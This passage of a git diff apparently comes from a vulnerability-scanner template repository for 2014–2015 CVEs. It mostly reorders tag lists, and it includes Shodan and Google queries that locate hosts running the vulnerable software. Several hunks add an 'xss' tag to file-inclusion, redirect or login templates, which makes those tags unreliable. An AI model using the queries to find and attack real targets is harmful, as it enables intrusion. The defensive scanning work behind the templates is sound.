@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: eyou
product: eyou
- tags: seclists,rce,eyou
+ tags: cve2014,cve,seclists,rce,eyou
http:
- raw:
diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml
index ef02d73f39..acf009db33 100644
--- a/http/cves/2014/CVE-2014-2321.yaml
+++ b/http/cves/2014/CVE-2014-2321.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: zte
product: f460
- tags: iot,cve,cve2014,zte
+ tags: cve2014,cve,iot,zte
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml
index 1caa0c73a1..f812e9d60b 100644
--- a/http/cves/2014/CVE-2014-2323.yaml
+++ b/http/cves/2014/CVE-2014-2323.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: lighttpd
product: lighttpd
- tags: lighttpd,injection,seclists,cve,cve2014,sqli
+ tags: cve2014,cve,lighttpd,injection,seclists,sqli
http:
- raw:
diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml
index 4cb056a41d..7991c0e9a1 100644
--- a/http/cves/2014/CVE-2014-2383.yaml
+++ b/http/cves/2014/CVE-2014-2383.yaml
@@ -29,7 +29,7 @@ info:
max-request: 11
vendor: dompdf
product: dompdf
- tags: cve,lfi,wp-plugin,wpscan,cve2014,dompdf,wordpress,wp,edb,seclists
+ tags: cve2014,cve,lfi,wp-plugin,wpscan,dompdf,wordpress,wp,edb,seclists
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml
index b0bf85d474..a4d483f372 100644
--- a/http/cves/2014/CVE-2014-2908.yaml
+++ b/http/cves/2014/CVE-2014-2908.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: siemens
product: simatic_s7_cpu_1200_firmware
- tags: cve,cve2014,xss,siemens,edb
+ tags: cve2014,cve,xss,siemens,edb
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml
index 4a8fd9bfc1..6acbc2d135 100644
--- a/http/cves/2014/CVE-2014-2962.yaml
+++ b/http/cves/2014/CVE-2014-2962.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: belkin
product: n150_f9k1009_firmware
- tags: cve,cve2014,lfi,router,firmware,traversal,belkin
+ tags: cve2014,cve,lfi,router,firmware,traversal,belkin
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml
index 192fc321cd..bf35b5ce3c 100644
--- a/http/cves/2014/CVE-2014-3120.yaml
+++ b/http/cves/2014/CVE-2014-3120.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: elasticsearch
product: elasticsearch
- tags: rce,elasticsearch,kev,vulhub,cve,cve2014,elastic
+ tags: cve2014,cve,rce,elasticsearch,kev,vulhub,elastic
http:
- raw:
diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml
index 8aba1bbc10..0c2d9554b7 100644
--- a/http/cves/2014/CVE-2014-3206.yaml
+++ b/http/cves/2014/CVE-2014-3206.yaml
@@ -25,7 +25,7 @@ info:
max-request: 2
vendor: seagate
product: blackarmor_nas_220_firmware
- tags: cve,cve2014,seagate,rce,edb
+ tags: cve2014,cve,seagate,rce,edb
http:
- raw:
diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml
index 30ed9237db..2c5b68ff60 100644
--- a/http/cves/2014/CVE-2014-3704.yaml
+++ b/http/cves/2014/CVE-2014-3704.yaml
@@ -29,7 +29,7 @@ info:
vendor: drupal
product: drupal
shodan-query: http.component:"drupal"
- tags: edb,cve,cve2014,drupal,sqli
+ tags: cve2014,cve,edb,drupal,sqli
variables:
num: "999999999"
diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml
index 56201c5447..1902744bfe 100644
--- a/http/cves/2014/CVE-2014-3744.yaml
+++ b/http/cves/2014/CVE-2014-3744.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: nodejs
product: node.js
- tags: cve,cve2014,lfi,nodejs,st
+ tags: cve2014,cve,lfi,nodejs,st
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml
index 240a63cf48..8cecaadeb5 100644
--- a/http/cves/2014/CVE-2014-4210.yaml
+++ b/http/cves/2014/CVE-2014-4210.yaml
@@ -28,7 +28,7 @@ info:
vendor: oracle
product: fusion_middleware
shodan-query: title:"Weblogic"
- tags: seclists,cve,cve2014,weblogic,oracle,ssrf,oast
+ tags: cve2014,cve,seclists,weblogic,oracle,ssrf,oast,xss
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml
index 1c1320c4c3..0e04f2e2d2 100644
--- a/http/cves/2014/CVE-2014-4513.yaml
+++ b/http/cves/2014/CVE-2014-4513.yaml
@@ -26,7 +26,7 @@ info:
product: activehelper_livehelp_live_chat
framework: wordpress
google-query: inurl:"/wp-content/plugins/activehelper-livehelp"
- tags: cve,cve2014,wordpress,xss,wp-plugin,activehelper
+ tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml
index 07f581a9c9..0d3c63fe58 100644
--- a/http/cves/2014/CVE-2014-4535.yaml
+++ b/http/cves/2014/CVE-2014-4535.yaml
@@ -26,7 +26,7 @@ info:
vendor: import_legacy_media_project
product: import_legacy_media
framework: wordpress
- tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth,import_legacy_media_project
+ tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml
index ea96f726a5..8e4f1a4c45 100644
--- a/http/cves/2014/CVE-2014-4536.yaml
+++ b/http/cves/2014/CVE-2014-4536.yaml
@@ -28,7 +28,7 @@ info:
product: infusionsoft_gravity_forms
framework: wordpress
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
- tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth,katz
+ tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml
index bb26d88096..6662a34e0a 100644
--- a/http/cves/2014/CVE-2014-4539.yaml
+++ b/http/cves/2014/CVE-2014-4539.yaml
@@ -26,7 +26,7 @@ info:
vendor: movies_project
product: movies
framework: wordpress
- tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth,movies_project
+ tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml
index 7e927c78d9..5c0fedfc5c 100644
--- a/http/cves/2014/CVE-2014-4544.yaml
+++ b/http/cves/2014/CVE-2014-4544.yaml
@@ -26,7 +26,7 @@ info:
vendor: podcast_channels_project
product: podcast_channels
framework: wordpress
- tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth,podcast_channels_project
+ tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,podcast_channels_project
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml
index facf173194..ebc4f29d7f 100644
--- a/http/cves/2014/CVE-2014-4550.yaml
+++ b/http/cves/2014/CVE-2014-4550.yaml
@@ -27,7 +27,7 @@ info:
product: ninja
framework: wordpress
google-query: inurl:"/wp-content/plugins/shortcode-ninja"
- tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth,visualshortcodes
+ tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,visualshortcodes
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml
index 1f24b30292..03cabd6a74 100644
--- a/http/cves/2014/CVE-2014-4558.yaml
+++ b/http/cves/2014/CVE-2014-4558.yaml
@@ -26,7 +26,7 @@ info:
vendor: cybercompany
product: swipehq-payment-gateway-woocommerce
framework: wordpress
- tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany
+ tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml
index bfb094135e..f59c4519ad 100644
--- a/http/cves/2014/CVE-2014-4561.yaml
+++ b/http/cves/2014/CVE-2014-4561.yaml
@@ -26,7 +26,7 @@ info:
vendor: ultimate-weather_project
product: ultimate-weather
framework: wordpress
- tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project
+ tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml
index 8cc9104ae9..c0f00b111e 100644
--- a/http/cves/2014/CVE-2014-4592.yaml
+++ b/http/cves/2014/CVE-2014-4592.yaml
@@ -26,7 +26,7 @@ info:
product: wp-planet
framework: wordpress
google-query: inurl:"/wp-content/plugins/wp-planet"
- tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth,czepol
+ tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,czepol
http:
- raw:
diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml
index 5cf2ff65ff..b8b0170124 100644
--- a/http/cves/2014/CVE-2014-4940.yaml
+++ b/http/cves/2014/CVE-2014-4940.yaml
@@ -27,7 +27,7 @@ info:
product: tera-charts
framework: wordpress
google-query: inurl:"/wp-content/plugins/tera-charts"
- tags: cve,cve2014,wordpress,wp-plugin,lfi,tera_charts_plugin_project
+ tags: cve2014,cve,wordpress,wp-plugin,lfi,tera_charts_plugin_project
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml
index a2a410c66a..7f380a4a2d 100644
--- a/http/cves/2014/CVE-2014-4942.yaml
+++ b/http/cves/2014/CVE-2014-4942.yaml
@@ -29,7 +29,7 @@ info:
vendor: levelfourdevelopment
product: wp-easycart
framework: wordpress
- tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment
+ tags: cve2014,cve,wpscan,wordpress,wp-plugin,wp,phpinfo,disclosure,levelfourdevelopment
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml
index 20a3c68cea..0ef4a45efd 100644
--- a/http/cves/2014/CVE-2014-5111.yaml
+++ b/http/cves/2014/CVE-2014-5111.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: netfortris
product: trixbox
- tags: packetstorm,cve,cve2014,lfi,trixbox,edb,netfortris
+ tags: cve2014,cve,packetstorm,lfi,trixbox,edb,netfortris,xss
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml
index 392924b8c1..4bae479e7d 100644
--- a/http/cves/2014/CVE-2014-5258.yaml
+++ b/http/cves/2014/CVE-2014-5258.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: webedition
product: webedition_cms
- tags: edb,packetstorm,cve,cve2014,lfi,webedition
+ tags: cve2014,cve,edb,packetstorm,lfi,webedition
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml
index 34942a093e..6c504821de 100644
--- a/http/cves/2014/CVE-2014-5368.yaml
+++ b/http/cves/2014/CVE-2014-5368.yaml
@@ -28,7 +28,7 @@ info:
product: wp_content_source_control
framework: wordpress
google-query: inurl:"/wp-content/plugins/wp-source-control"
- tags: cve,cve2014,wordpress,wp-plugin,lfi,edb,seclists,wp_content_source_control_project
+ tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,seclists,wp_content_source_control_project
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-6271.yaml b/http/cves/2014/CVE-2014-6271.yaml
index 1a0a403296..d58f399c61 100644
--- a/http/cves/2014/CVE-2014-6271.yaml
+++ b/http/cves/2014/CVE-2014-6271.yaml
@@ -27,7 +27,7 @@ info:
max-request: 8
vendor: gnu
product: bash
- tags: cve,cve2014,rce,shellshock,kev,gnu
+ tags: cve2014,cve,rce,shellshock,kev,gnu
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml
index 1eaffcd068..ecdcaa0924 100644
--- a/http/cves/2014/CVE-2014-6287.yaml
+++ b/http/cves/2014/CVE-2014-6287.yaml
@@ -30,7 +30,7 @@ info:
vendor: rejetto
product: http_file_server
shodan-query: http.favicon.hash:2124459909
- tags: packetstorm,msf,cve,cve2014,hfs,rce,kev,rejetto
+ tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto
variables:
str1: '{{rand_base(6)}}'
str2: 'CVE-2014-6287'
diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml
index 7c5e4528d2..3e5fdbd19f 100644
--- a/http/cves/2014/CVE-2014-6308.yaml
+++ b/http/cves/2014/CVE-2014-6308.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: osclass
product: osclass
- tags: cve,cve2014,lfi,packetstorm,osclass
+ tags: cve2014,cve,lfi,packetstorm,osclass
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml
index 097d139294..a33951c010 100644
--- a/http/cves/2014/CVE-2014-8676.yaml
+++ b/http/cves/2014/CVE-2014-8676.yaml
@@ -28,7 +28,7 @@ info:
max-request: 1
vendor: soplanning
product: soplanning
- tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi
+ tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml
index b796dc21a7..c320c263c7 100644
--- a/http/cves/2014/CVE-2014-8682.yaml
+++ b/http/cves/2014/CVE-2014-8682.yaml
@@ -29,7 +29,7 @@ info:
vendor: gogits
product: gogs
shodan-query: title:"Sign In - Gogs"
- tags: gogs,seclists,packetstorm,edb,cve,cve2014,sqli,gogits
+ tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml
index 2bd03dd962..29d054d44e 100644
--- a/http/cves/2014/CVE-2014-8799.yaml
+++ b/http/cves/2014/CVE-2014-8799.yaml
@@ -29,7 +29,7 @@ info:
product: dukapress
framework: wordpress
google-query: inurl:"/wp-content/plugins/dukapress"
- tags: cve,cve2014,wordpress,wp-plugin,lfi,edb,dukapress
+ tags: cve2014,cve,wordpress,wp-plugin,lfi,edb,dukapress
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml
index 8228f76137..650c8c9187 100644
--- a/http/cves/2014/CVE-2014-9094.yaml
+++ b/http/cves/2014/CVE-2014-9094.yaml
@@ -27,7 +27,7 @@ info:
product: video_gallery
framework: wordpress
google-query: inurl:"/wp-content/plugins/dzs-videogallery"
- tags: cve2014,wordpress,xss,wp-plugin,seclists,cve,digitalzoomstudio
+ tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml
index 4d8ec043d4..39068d6730 100644
--- a/http/cves/2014/CVE-2014-9119.yaml
+++ b/http/cves/2014/CVE-2014-9119.yaml
@@ -29,7 +29,7 @@ info:
vendor: db_backup_project
product: db_backup
framework: wordpress
- tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project
+ tags: cve2014,cve,lfi,wordpress,wp-plugin,wp,backup,wpscan,edb,db_backup_project
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml
index 7632df9825..a35c3f1f13 100644
--- a/http/cves/2014/CVE-2014-9180.yaml
+++ b/http/cves/2014/CVE-2014-9180.yaml
@@ -25,7 +25,7 @@ info:
vendor: eleanor-cms
product: eleanor_cms
shodan-query: html:"eleanor"
- tags: packetstorm,cve,cve2014,eleanor,cms,redirect,eleanor-cms
+ tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml
index 85b035104f..f3c918a845 100644
--- a/http/cves/2014/CVE-2014-9444.yaml
+++ b/http/cves/2014/CVE-2014-9444.yaml
@@ -26,7 +26,7 @@ info:
vendor: frontend_uploader_project
product: frontend_uploader
framework: wordpress
- tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth,frontend_uploader_project
+ tags: cve2014,cve,wp-plugin,xss,wpscan,packetstorm,wordpress,unauth,frontend_uploader_project
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml
index cb463199e7..3d83f0d46d 100644
--- a/http/cves/2014/CVE-2014-9606.yaml
+++ b/http/cves/2014/CVE-2014-9606.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: netsweeper
product: netsweeper
- tags: cve2014,netsweeper,xss,packetstorm,cve
+ tags: cve2014,cve,netsweeper,xss,packetstorm
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml
index 6b2e3c8af0..86bf6ae4f7 100644
--- a/http/cves/2014/CVE-2014-9607.yaml
+++ b/http/cves/2014/CVE-2014-9607.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: netsweeper
product: netsweeper
- tags: packetstorm,cve,cve2014,netsweeper,xss
+ tags: cve2014,cve,packetstorm,netsweeper,xss
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml
index 4cdf4b7ca7..7c2e136e09 100644
--- a/http/cves/2014/CVE-2014-9608.yaml
+++ b/http/cves/2014/CVE-2014-9608.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: netsweeper
product: netsweeper
- tags: cve,cve2014,netsweeper,xss,packetstorm
+ tags: cve2014,cve,netsweeper,xss,packetstorm
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml
index a255366ae5..cc936ae0ce 100644
--- a/http/cves/2014/CVE-2014-9609.yaml
+++ b/http/cves/2014/CVE-2014-9609.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: netsweeper
product: netsweeper
- tags: cve2014,netsweeper,lfi,packetstorm,cve
+ tags: cve2014,cve,netsweeper,lfi,packetstorm,xss
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml
index 45d2332e61..19d25db5c1 100644
--- a/http/cves/2014/CVE-2014-9614.yaml
+++ b/http/cves/2014/CVE-2014-9614.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: netsweeper
product: netsweeper
- tags: cve,cve2014,netsweeper,default-login,packetstorm
+ tags: cve2014,cve,netsweeper,default-login,packetstorm,xss
http:
- raw:
diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml
index c891e01855..cec74dfb2d 100644
--- a/http/cves/2014/CVE-2014-9615.yaml
+++ b/http/cves/2014/CVE-2014-9615.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: netsweeper
product: netsweeper
- tags: cve,cve2014,netsweeper,xss,packetstorm
+ tags: cve2014,cve,netsweeper,xss,packetstorm
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml
index 8b13e03998..4bb9006e37 100644
--- a/http/cves/2014/CVE-2014-9617.yaml
+++ b/http/cves/2014/CVE-2014-9617.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: netsweeper
product: netsweeper
- tags: cve,cve2014,netsweeper,redirect,packetstorm
+ tags: cve2014,cve,netsweeper,redirect,packetstorm,xss
http:
- method: GET
diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml
index a95fd3fa6a..86022aee37 100644
--- a/http/cves/2014/CVE-2014-9618.yaml
+++ b/http/cves/2014/CVE-2014-9618.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: netsweeper
product: netsweeper
- tags: cve2014,netsweeper,auth-bypass,packetstorm,edb,cve
+ tags: cve2014,cve,netsweeper,auth-bypass,packetstorm,edb,xss
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-0554.yaml b/http/cves/2015/CVE-2015-0554.yaml
index 40e9571c47..08ee4eb798 100644
--- a/http/cves/2015/CVE-2015-0554.yaml
+++ b/http/cves/2015/CVE-2015-0554.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: adb
product: p.dga4001n_firmware
- tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015,adb
+ tags: cve2015,cve,pirelli,router,disclosure,edb,packetstorm,adb
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml
index ed924e1d46..9de852b90c 100644
--- a/http/cves/2015/CVE-2015-1000005.yaml
+++ b/http/cves/2015/CVE-2015-1000005.yaml
@@ -27,7 +27,7 @@ info:
vendor: candidate-application-form_project
product: candidate-application-form
framework: wordpress
- tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp,candidate-application-form_project
+ tags: cve2015,cve,wpscan,wordpress,wp-plugin,lfi,wp,candidate-application-form_project
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-1000010.yaml b/http/cves/2015/CVE-2015-1000010.yaml
index 379b30606c..d7178f2787 100644
--- a/http/cves/2015/CVE-2015-1000010.yaml
+++ b/http/cves/2015/CVE-2015-1000010.yaml
@@ -28,7 +28,7 @@ info:
vendor: simple-image-manipulator_project
product: simple-image-manipulator
framework: wordpress
- tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp,simple-image-manipulator_project
+ tags: cve2015,cve,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,simple-image-manipulator_project
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-1000012.yaml b/http/cves/2015/CVE-2015-1000012.yaml
index 7bb0f2724e..2ca4521c5a 100644
--- a/http/cves/2015/CVE-2015-1000012.yaml
+++ b/http/cves/2015/CVE-2015-1000012.yaml
@@ -28,7 +28,7 @@ info:
product: mypixs
framework: wordpress
google-query: inurl:"/wp-content/plugins/mypixs"
- tags: cve2015,wordpress,wp-plugin,lfi,wpscan,cve,mypixs_project
+ tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,mypixs_project
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml
index ad69e1dce4..45efa3e4a6 100644
--- a/http/cves/2015/CVE-2015-1427.yaml
+++ b/http/cves/2015/CVE-2015-1427.yaml
@@ -27,7 +27,7 @@ info:
max-request: 2
vendor: elasticsearch
product: elasticsearch
- tags: packetstorm,cve,cve2015,elastic,rce,elasticsearch,kev
+ tags: cve2015,cve,packetstorm,elastic,rce,elasticsearch,kev
http:
- raw:
diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml
index 4d92c3fe50..350c97fdd5 100644
--- a/http/cves/2015/CVE-2015-1503.yaml
+++ b/http/cves/2015/CVE-2015-1503.yaml
@@ -27,7 +27,7 @@ info:
vendor: icewarp
product: mail_server
shodan-query: title:"icewarp"
- tags: lfi,mail,packetstorm,cve,cve2015,icewarp
+ tags: cve2015,cve,lfi,mail,packetstorm,icewarp
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml
index e0a4128139..dbdf828114 100644
--- a/http/cves/2015/CVE-2015-1579.yaml
+++ b/http/cves/2015/CVE-2015-1579.yaml
@@ -30,7 +30,7 @@ info:
product: divi
framework: wordpress
google-query: inurl:/wp-content/plugins/revslider
- tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015,elegant_themes
+ tags: cve2015,cve,wordpress,wp-plugin,lfi,revslider,wp,wpscan,elegant_themes
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml
index c466aac4d6..4309a49761 100644
--- a/http/cves/2015/CVE-2015-1880.yaml
+++ b/http/cves/2015/CVE-2015-1880.yaml
@@ -27,7 +27,7 @@ info:
max-request: 1
vendor: fortinet
product: fortios
- tags: cve,cve2015,xss,fortigates,intrusive,fortinet
+ tags: cve2015,cve,xss,fortigates,intrusive,fortinet
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-2067.yaml b/http/cves/2015/CVE-2015-2067.yaml
index 8949bbf278..c279344bbb 100644
--- a/http/cves/2015/CVE-2015-2067.yaml
+++ b/http/cves/2015/CVE-2015-2067.yaml
@@ -27,7 +27,7 @@ info:
product: magmi
framework: magento_server
shodan-query: http.component:"Magento"
- tags: plugin,edb,packetstorm,cve,cve2015,lfi,magento,magmi,magmi_project,magento_server
+ tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml
index d7e391a72c..01ae66214a 100644
--- a/http/cves/2015/CVE-2015-2068.yaml
+++ b/http/cves/2015/CVE-2015-2068.yaml
@@ -28,7 +28,7 @@ info:
product: magmi
framework: magento_server
shodan-query: http.component:"Magento"
- tags: plugin,edb,packetstorm,cve,cve2015,magento,magmi,xss,magmi_project,magento_server
+ tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml
index a581c39e14..c4fb4941b2 100644
--- a/http/cves/2015/CVE-2015-2080.yaml
+++ b/http/cves/2015/CVE-2015-2080.yaml
@@ -25,7 +25,7 @@ info:
max-request: 1
vendor: fedoraproject
product: fedora
- tags: cve,cve2015,jetty,packetstorm,fedoraproject
+ tags: cve2015,cve,jetty,packetstorm,fedoraproject
http:
- method: POST
diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml
index 5b19002618..7a54e724da 100644
--- a/http/cves/2015/CVE-2015-2166.yaml
+++ b/http/cves/2015/CVE-2015-2166.yaml
@@ -26,7 +26,7 @@ info:
max-request: 1
vendor: ericsson
product: drutt_mobile_service_delivery_platform
- tags: cve,cve2015,lfi,ericsson,edb,packetstorm
+ tags: cve2015,cve,lfi,ericsson,edb,packetstorm
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml
index 40d2f4671d..0263fb3235 100644
--- a/http/cves/2015/CVE-2015-2196.yaml
+++ b/http/cves/2015/CVE-2015-2196.yaml
@@ -28,7 +28,7 @@ info:
vendor: web-dorado
product: spider_calendar
framework: wordpress
- tags: wordpress,wp,sqli,cve2015,wpscan,wp-plugin,spider-event-calendar,unauth,edb,cve,web-dorado
+ tags: cve2015,cve,wordpress,wp,sqli,wpscan,wp-plugin,spider-event-calendar,unauth,edb,web-dorado
http:
- raw:
diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml
index dcd3cf0360..7e064e628a 100644
--- a/http/cves/2015/CVE-2015-2755.yaml
+++ b/http/cves/2015/CVE-2015-2755.yaml
@@ -30,7 +30,7 @@ info:
vendor: ab_google_map_travel_project
product: ab_google_map_travel
framework: wordpress
- tags: cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,cve,ab_google_map_travel_project
+ tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,ab_google_map_travel_project
http:
- raw:
diff --git a/http/cves/2015/CVE-2015-2794.yaml b/http/cves/2015/CVE-2015-2794.yaml
index fe3ac288a1..3776436862 100644
--- a/http/cves/2015/CVE-2015-2794.yaml
+++ b/http/cves/2015/CVE-2015-2794.yaml
@@ -23,7 +23,7 @@ info:
product: dotnetnuke
verified: true
fofo-query: app="DotNetNuke"
- tags: cve,cve2015,dotnetnuke,auth-bypass,install
+ tags: cve2015,cve,dotnetnuke,auth-bypass,install
http:
- method: GET
diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml
index 416ca5e50a..d0939a1983 100644
--- a/http/cves/2015/CVE-2015-2807.yaml
+++ b/http/cves/2015/CVE-2015-2807.yaml
@@ -29,7 +29,7 @@ info:
product: navis_documentcloud
framework: wordpress
